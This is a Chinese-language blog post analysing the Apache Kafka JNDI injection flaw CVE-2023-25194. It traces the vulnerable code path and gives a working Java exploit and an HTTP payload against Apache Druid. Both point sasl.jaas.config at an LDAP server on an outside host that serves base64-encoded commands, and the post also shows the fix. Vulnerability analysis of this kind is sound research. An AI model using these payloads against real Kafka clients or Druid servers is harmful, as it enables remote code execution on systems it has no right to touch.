首页 > 其他分享 >Kafka JNDI 注入分析(CVE-2023-25194)

Kafka JNDI 注入分析(CVE-2023-25194)

时间:2023-11-10 11:35:19浏览次数:37  
标签:25194 put kafka JNDI props apache org security Kafka

Apache Kafka Clients Jndi Injection

漏洞描述

Apache Kafka 是一个分布式数据流处理平台,可以实时发布、订阅、存储和处理数据流。Kafka Connect 是一种用于在 kafka 和其他系统之间可扩展、可靠的流式传输数据的工具。攻击者可以利用基于 SASL JAAS 配置和 SASL 协议的任意 Kafka 客户端,对 Kafka Connect worker 创建或修改连接器时,通过构造特殊的配置,进行 JNDI 注入来实现远程代码执行。

影响范围

2.4.0 <= Apache Kafka <= 3.3.2

前置知识

Kafka 是什么

Kafka 是一个开源的分布式消息系统,Kafka 可以处理大量的消息和数据流,具有高吞吐量、低延迟、可扩展性等特点。它被广泛应用于大数据领域,如日志收集、数据传输、流处理等场景。

感觉上和 RocketMQ 很类似,主要功能都是用来进行数据传输的。

Kafka 客户端 SASL JAAS 配置

简单认证与安全层 (SASL, Simple Authentication and Security Layer ) 是一个在网络协议中用来认证和数据加密的构架,在 Kafka 的实际应用当中表现为 JAAS。

Java 认证和授权服务(Java Authentication and Authorization Service,简称 JAAS)是一个 Java 以用户为中心的安全框架,作为 Java 以代码为中心的安全的补充。总结一下就是用于认证。有趣的是 Shiro (JSecurity) 最初被开发出来的原因就是由于当时 JAAS 存在着许多缺点

参考自 https://blog.csdn.net/yinxuep/article/details/103242969 还有一些细微的配置这里不再展开。动态设置和静态修改 .conf 文件实际上效果是一致的。

服务端配置

1、通常在服务器节点下配置服务器 JASS 文件,例如这里我们将其命名为 kafka_server_jaas.conf,内容如下

KafkaServer {
    org.apache.kafka.common.security.plain.PlainLoginModule required
    username="eystar"
    password="eystar8888"
    user_eystar="eystar8888"
    user_yxp="yxp-secret";
};

说明:

username +password 表示 kafka 集群环境各个代理之间进行通信时使用的身份验证信息。

user_eystar="eystar8888" 表示定义客户端连接到代理的用户信息,即创建一个用户名为 eystar,密码为 eystar8888 的用户身份信息,kafka 代理对其进行身份验证,可以创建多个用户,格式 user_XXX=”XXX”

2、如果处于静态使用中,需要将其加入到 JVM 启动参数中,如下

if [ "x$KAFKA_OPTS" ]; then

    export KAFKA_OPTS="-Djava.security.auth.login.config=/opt/modules/kafka_2.11-2.0.0/config/kafka_server_jaas.conf"

fi

https://kafka.apache.org/documentation/#brokerconfigs_sasl.jaas.config

客户端配置

基本同服务端一致,如下步骤

1、配置客户端 JAAS 文件,命名为 kafka_client_jaas.conf

KafkaClient {
        org.apache.kafka.common.security.plain.PlainLoginModule required
        username="eystar"
        password="eystar8888";
};

2、JAVA 调用的 Kafka Client 客户端连接时指定配置属性 sasl.jaas.config

sasl.jaas.config=org.apache.kafka.common.security.plain.PlainLoginModule required \
    username="eystar" \
password="eystar8888";
// 即配置属性:(后续会讲到也能够动态配置,让我想起了 RocketMQ)
Pro.set(“sasl.jaas.config”,”org.apache.kafka.common.security.plain.PlainLoginModule required username=\"eystar\" password=\"eystar8888\";";
”);

Kafka 客户端动态修改 JAAS 配置

方式一:配置 Properties 属性,可以注意到这一个字段的键名为 sasl.jaas.config,它的格式如下

loginModuleClass controlFlag (optionName=optionValue)*;

其中的 loginModuleClass 代表认证方式, 例如 LDAP, Kerberos, Unix 认证,可以参考官方文档 https://docs.oracle.com/javase/8/docs/technotes/guides/security/jgss/tutorials/LoginConfigFile.html 其中有一处为 JndiLoginModule,JDK 自带的 loginModule 位于 com.sun.security.auth.module

Kafka JNDI 注入分析(CVE-2023-25194)_JNDI注入

//安全模式 用户名 密码
props.setProperty("sasl.jaas.config", "org.apache.kafka.common.security.plain.PlainLoginModule required username=\"usn\" password=\"pwd\";");
props.setProperty("security.protocol", "SASL_PLAINTEXT");
props.setProperty("sasl.mechanism", "PLAIN");

方式二:设置系统属性参数

帮助网安学习,全套资料S信免费领取:

① 网安学习成长路径思维导图

② 60+网安经典常用工具包

③ 100+SRC分析报告

④ 150+网安攻防实战技术电子书

⑤ 最权威CISSP 认证考试指南+题库

⑥ 超1800页CTF实战技巧手册

⑦ 最新网安大厂面试题合集(含答案)

⑧ APP客户端安全检测指南(安卓+IOS)

// 指定kafka_client_jaas.conf文件路径 
String confPath = TestKafkaComsumer.class.getResource("/").getPath()+ "/kafka_client_jaas.conf"; 
System.setProperty("java.security.auth.login.config", confPath);

实现代码

消费者

public class TestComsumer {

   public static void main(String[] args) {

        Properties props = new Properties();
        props.put("bootstrap.servers", "192.168.1.176:9092");
        props.put("group.id", "test_group");
        props.put("enable.auto.commit", "true");
        props.put("auto.commit.interval.ms", "1000");
        props.put("key.deserializer",
                "org.apache.kafka.common.serialization.StringDeserializer");
        props.put("value.deserializer",
                "org.apache.kafka.common.serialization.StringDeserializer");
        // sasl.jaas.config的配置
        props.setProperty("sasl.jaas.config", "org.apache.kafka.common.security.plain.PlainLoginModule required username=\"usn\" password=\"pwd\";");
        props.setProperty("security.protocol", "SASL_PLAINTEXT");
        props.setProperty("sasl.mechanism", "PLAIN");

        KafkaConsumer<String, String> consumer = new KafkaConsumer<>(props);
        consumer.subscribe(Arrays.asList("topic_name"));
        while (true) {
           try {
                ConsumerRecords<String, String> records = consumer.poll(Duration
                        .ofMillis(100));
                for (ConsumerRecord<String, String> record : records)
                    System.out.printf("offset = %d, partition = %d, key = %s, value = %s%n",
                            record.offset(), record.partition(), record.key(), record.value());
          
            } catch (Exception e) {
                e.printStackTrace();
            }
        }

    
    }

}

生产者

public class TestProduce {

    public static void main(String args[]) {

        Properties props = new Properties();

        props.put("bootstrap.servers", "192.168.1.176:9092");
        props.put("acks", "1");
        props.put("retries", 3);
        props.put("batch.size", 16384);
        props.put("buffer.memory", 33554432);
        props.put("linger.ms", 10);
        props.put("key.serializer",
                "org.apache.kafka.common.serialization.StringSerializer");
        props.put("value.serializer",
                "org.apache.kafka.common.serialization.StringSerializer");

        //sasl
        props.setProperty("sasl.jaas.config", "org.apache.kafka.common.security.plain.PlainLoginModule required username=\"usn\" password=\"pwd\";");
        props.setProperty("security.protocol", "SASL_PLAINTEXT");
        props.setProperty("sasl.mechanism", "PLAIN");

        Producer<String, String> producer = new KafkaProducer<>(props);
        
       /**
        * ProducerRecord 参数解析 第一个:topic_name为生产者 topic名称,
        * 第二个:对于生产者kafka2.0需要你指定一个key
        * ,在企业应用中,我们一般会把他当做businessId来用,比如订单ID,用户ID等等。 第三个:消息的主要信息
        */

        try {
              producer.send(new ProducerRecord<String, String>("topic_name", Integer.toString(i), "message info"));

        } catch (InterruptedException e) {
               e.printStackTrace();
        }

   }

}

漏洞复现

漏洞触发点其实是在 com.sun.security.auth.module.JndiLoginModule#attemptAuthentication 方法处

Kafka JNDI 注入分析(CVE-2023-25194)_漏洞修复_02

理顺逻辑很容易构造出 EXP

import org.apache.kafka.clients.consumer.KafkaConsumer;
import org.apache.kafka.clients.producer.KafkaProducer;

import java.util.Properties;

public class EXP {
    public static void main(String[] args) throws Exception {
        Properties properties = new Properties();
        properties.put("bootstrap.servers", "127.0.0.1:1234");
        properties.put("key.deserializer", "org.apache.kafka.common.serialization.StringDeserializer");
        properties.put("value.deserializer","org.apache.kafka.common.serialization.StringDeserializer");

        properties.put("sasl.mechanism", "PLAIN");
        properties.put("security.protocol", "SASL_SSL");
        properties.put("sasl.jaas.config", "com.sun.security.auth.module.JndiLoginModule " +
                "required " +
                "user.provider.url=\"ldap://124.222.21.138:1389/Basic/Command/Base64/Q2FsYw==\" " +
                "useFirstPass=\"true\" " +
                "group.provider.url=\"xxx\";");

        KafkaConsumer<String, String> kafkaConsumer = new KafkaConsumer<>(properties);
        kafkaConsumer.close();
    }
}

Kafka JNDI 注入分析(CVE-2023-25194)_kafka_03

漏洞分析

前面有非常多的数据处理与赋值,这里就跳过了,直接看 org.apache.kafka.clients.consumer.KafkaConsumer 类的第 177 行 ClientUtils.createChannelBuilder(),跟进。

Kafka JNDI 注入分析(CVE-2023-25194)_漏洞修复_04

继续跟进,这里会先判断 SASL 模式是否开启,只有开启了才会往下跟进到 create() 方法

Kafka JNDI 注入分析(CVE-2023-25194)_JNDI注入_05

跟进 create() 方法,做完客户端的判断和安全协议的判断之后,调用了 loadClientContext() 方法,跟进,发现其中还是加载了一些配置。

Kafka JNDI 注入分析(CVE-2023-25194)_JNDI注入_06

跳出来,跟进 ((ChannelBuilder)channelBuilder).configure(configs) 方法,最后跟到 org.apache.kafka.common.security.authenticator.LoginManager 的构造函数。

Kafka JNDI 注入分析(CVE-2023-25194)_apache_07

跟进 login() 方法,此处 new LoginContext(),随后调用 login() 方法,跟进

Kafka JNDI 注入分析(CVE-2023-25194)_漏洞修复_08

这里会调用 JndiLoginModule 的 initialize() 方法

Kafka JNDI 注入分析(CVE-2023-25194)_漏洞复现_09

初始化完成之后,此处调用 JndiLoginModule 的 login() 方法,最后到 JndiLoginModule 的 attemptAuthentication() 方法,完成 Jndi 注入。

Kafka JNDI 注入分析(CVE-2023-25194)_kafka_10

漏洞修复

在 3.4.0 版本中, 官方的修复方式是增加了对 JndiLoginModule 的黑名单

org.apache.kafka.common.security.JaasContext#throwIfLoginModuleIsNotAllowed

private static void throwIfLoginModuleIsNotAllowed(AppConfigurationEntry appConfigurationEntry) {
    Set<String> disallowedLoginModuleList = (Set)Arrays.stream(System.getProperty("org.apache.kafka.disallowed.login.modules", "com.sun.security.auth.module.JndiLoginModule").split(",")).map(String::trim).collect(Collectors.toSet());
    String loginModuleName = appConfigurationEntry.getLoginModuleName().trim();
    if (disallowedLoginModuleList.contains(loginModuleName)) {
        throw new IllegalArgumentException(loginModuleName + " is not allowed. Update System property '" + "org.apache.kafka.disallowed.login.modules" + "' to allow " + loginModuleName);
    }
}

Apache Druid RCE via Kafka Clients

影响版本:Apache Druid <= 25.0.0

Apache Druid 是一个实时分析型数据库, 它支持从 Kafka 中导入数据 (Consumer) , 因为目前最新版本的 Apache Druid 25.0.0 所用 kafka-clients 依赖的版本仍然是 3.3.1, 即存在漏洞的版本, 所以如果目标 Druid 存在未授权访问 (默认配置无身份认证), 则可以通过这种方式实现 RCE

有意思的是, Druid 包含了 commons-beanutils:1.9.4 依赖, 所以即使在高版本 JDK 的情况下也能通过 LDAP JNDI 打反序列化 payload 实现 RCE

  • 漏洞 UI 处触发点:Druid Web Console - Load data - Apache Kafka

在这里可以加载 Kafka 的 Data,其中可以修改配置项 sasl.jaas.config,由此构造 Payload

POST http://124.222.21.138:8888/druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: 124.222.21.138:8888
Content-Length: 916
Accept: application/json, text/plain, */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.43
Content-Type: application/json
Origin: http://124.222.21.138:8888
Referer: http://124.222.21.138:8888/unified-console.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6,ja;q=0.5,zh-TW;q=0.4,no;q=0.3,ko;q=0.2
Connection: close

{"type":"kafka","spec":{"type":"kafka","ioConfig":{"type":"kafka","consumerProperties":{"bootstrap.servers":"127.0.0.1:1234",
"sasl.mechanism":"SCRAM-SHA-256",
                "security.protocol":"SASL_SSL",
                "sasl.jaas.config":"com.sun.security.auth.module.JndiLoginModule required user.provider.url=\"ldap://124.222.21.138:1389/Basic/Command/base64/aWQgPiAvdG1wL3N1Y2Nlc3M=\" useFirstPass=\"true\" serviceName=\"x\" debug=\"true\" group.provider.url=\"xxx\";"
},"topic":"123","useEarliestOffset":true,"inputFormat":{"type":"regex","pattern":"([\\s\\S]*)","listDelimiter":"56616469-6de2-9da4-efb8-8f416e6e6965","columns":["raw"]}},"dataSchema":{"dataSource":"sample","timestampSpec":{"column":"!!!_no_such_column_!!!","missingValue":"1970-01-01T00:00:00Z"},"dimensionsSpec":{},"granularitySpec":{"rollup":false}},"tuningConfig":{"type":"kafka"}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}

Kafka JNDI 注入分析(CVE-2023-25194)_JNDI注入_11

Kafka JNDI 注入分析(CVE-2023-25194)_JNDI注入_12

在 druid-kafka-indexing-service 这个 extension 中可以看到实例化 KafkaConsumer 的过程

Kafka JNDI 注入分析(CVE-2023-25194)_JNDI注入_13

而上面第 286 行的 addConsumerPropertiesFromConfig() 正是进行了动态修改配置

Apache Druid 26.0.0 更新了 kafka 依赖的版本

https://github.com/apache/druid/blob/26.0.0/pom.xml#L79

Kafka JNDI 注入分析(CVE-2023-25194)_apache_14

  

标签:25194,put,kafka,JNDI,props,apache,org,security,Kafka
From: https://blog.51cto.com/u_14601424/8294038

相关文章

  • Kafka队列
    ......
  • Introducing the core concepts of Kafka
    IntroductionI havelearntthekafkasince5years,IbelieveIlearndsomthing,Itisontimeforimprovingenglish.SoIdecidedtopickupmyblogs,towritingsomeconceptsofkafkaforconsolidatingmemory.Bytheway, makingmyenglishbetter.How......
  • kafka第三天学习笔记
    在第三天学习Kafka中,你可能会遇到一些关于Kafka的核心概念和特性的深入讨论。以下是一些可能的学习点:Kafka的设计理念:Kafka的设计理念是“发布-订阅”模型,允许消费者根据其需求从多个生产者那里接收消息。这种模型使得Kafka能够以高吞吐量和可扩展的方式处理实时数据流。Ka......
  • kafka第二天学习笔记
    第二天学习Kafka,我们继续深入了解这个分布式流处理平台的核心概念和功能。以下是一些重要的知识点和概念:Kafka的消费者组:消费者组是多个消费者实例的组合,可以共同消费一个topic中的消息。消费者组中的每个消费者会均匀分配topic中的消息,实现负载均衡和高可用性。Kafka的分区策略:当......
  • Spring Kafka: UnknownHostException: 34bcfcc207e0
    参考:https://stackoverflow.com/questions/69527813/spring-kafka-unknownhostexception-34bcfcc207e0我遇到的问题和@AdánEscobar是一样的。在SpringBoot整合kafka的时候日志报了SpringKafka:UnknownHostException:34bcfcc207e0,34bcfcc207e0经过排查是容器的ID。解决......
  • kafka配置-代码配置篇
    KafkaProducerConfig@Configuration@EnableKafkapublicclassKafkaProducerConfig{/***ProducerTemplate配置*/@Bean(name="kafkaTemplate")publicKafkaTemplate<String,String>kafkaTemplate(){returnne......
  • kafka配置-yml篇
    spring:kafka:template:#当使用kafkaTemplate的sendDefault方法的时候,使用的是这里配置的topicdefaultTopic:topic-1#partition-num和replication-numKafkaProperties没有提供配置的地方bootstrap-servers:127.0.0.1:9092produ......
  • kafka第一天学习笔记
    以下是Kafka第一天的学习笔记:Kafka是什么?ApacheKafka是一个开源的分布式流处理平台,用于构建实时数据管道和流应用程序。它提供了高吞吐量、可扩展、可靠的消息传递,可以处理来自多个源的大量数据。Kafka的核心组件Kafka有四个核心组件:生产者(Producer)、代理(Broker)、消费者(Consumer)和......
  • [Flink/Kafka] Flink消费Kafka消息的检查点设置方式 [转载]
    flink消费kafka本机java代码测试flink消费kafka机制flink消费kafka数据,提交消费组offset有三种类型1、开启checkpoint:                         在checkpoint完成后提交 2、开启checkpoint,禁用checkpoint提......
  • Kafka常用命令
    Kafka实操命令kafka版本:scala2.11,kafka1.1.0kafka_2.11-1.1.0.jarKafka命令行操作1)查看当前服务器中的所有topickafka-topics.sh--zookeeperhadoop111:2181/kafka--list2)创建topickafka-topics.sh--zookeeperhadoop111:2181/kafka--create--replication-factor3......